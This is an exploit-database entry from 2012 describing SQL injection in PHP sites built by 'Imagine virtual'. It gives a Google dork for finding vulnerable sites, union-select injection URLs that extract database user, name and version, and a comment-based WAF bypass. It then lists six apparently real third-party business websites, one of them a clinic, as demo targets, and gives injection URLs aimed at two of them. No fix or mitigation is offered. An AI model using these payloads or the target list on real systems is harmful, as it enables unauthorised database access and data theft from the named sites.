Imagine virtual Sql Injection Vulnerability

2012-12-15T00:00:00
ID 1337DAY-ID-19983
Type zdt
Reporter Sys32
Modified 2012-12-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #
#     ____                        68b                  
#    6MMMMb\                      Y89                  
#   6M'    `                       9                   
#   MM       ____    ___   ____   /     ____     ____  
#   YM.      `MM(    )M'  6MMMMb\      6MMMMb   6MMMMb 
#    YMMMMb   `Mb    d'  MM'    `     MM'  `Mb MM'  `Mb
#        `Mb   YM.  ,P   YM.                MM      ,MM
#         MM    MM  M     YMMMMb           .M9     ,MM'
#         MM    `Mbd'         `Mb       MMMM     ,M'   
#   L    ,M9     YMP     L    ,MM          `Mb ,M'     
#   MYMMMM9       M      MYMMMM9            MM MMMMMMMM
#                d'                         MM         
#            (8),P                    MM.  ,M9         @PT
#             YMM                      YMMMM9           
#  
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Imagine virtual Sql Injection Vulnerability
# Google Dork: intext:"Design by imagine virtual" inurl:".php?id="
# Date: 15/12/2012
# Author: Sys32
# Email: tha.Sys32[at]gmail[dot]com
# Vendor: http://www.imaginevirtual.com
# Category: Webapp
# Tested on: Backtrack 5 r3
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# I. INFO.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The application is vulnerable to sql injection, allowing an attacker to gain full access to the database.
# Some injections need WAF bypass
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# II. EXPLOIT.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# http://127.0.0.1/vull-page.php?id=[Sql-Injection]
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# III. EXPLOIT Example.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Injection:
#
# http://127.0.0.1/Vull-page.php?id=-3 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# http://127.0.0.1/vull-page.php?id=-7' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11+--+
#
# Injection + WAF Bypass:
#
# http://127.0.0.1/Vull-page.php?id=-3 /*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# IV. Risk.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The security risk of the remote sql injection vulnerability is estimated as critical.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

Demo Site:

http://www.fotomiraflores.com/loja.php?id=4
http://www.fotomiraflores.com/loja.php?id=4' //unable load properly

http://www.incasadesign.com/quadros.php?id=204
http://www.incasadesign.com/quadros.php?id=204' //unable load properly

http://www.pizzasdozoo.com/produto.php?id=7
http://www.pizzasdozoo.com/produto.php?id=7' // error !

http://www.in-timeclinic.com/especialidade.php?id=13
http://www.in-timeclinic.com/especialidade.php?id=13' // error

http://quedente.com/dynamic.php?id=15
http://quedente.com/dynamic.php?id=15' //unable load properly

http://www.permutauto.pt/auto.php?id=74
http://www.permutauto.pt/auto.php?id=74' //unable load properly


Demo Injection:

http://www.pizzasdozoo.com/produto.php?id=-7'
/*!20000union*/+/*!20000SelEct*/
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11+--+

http://www.incasadesign.com/quadros.php?id=-204' UNION SELECT
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

#  0day.today [2018-04-13]  #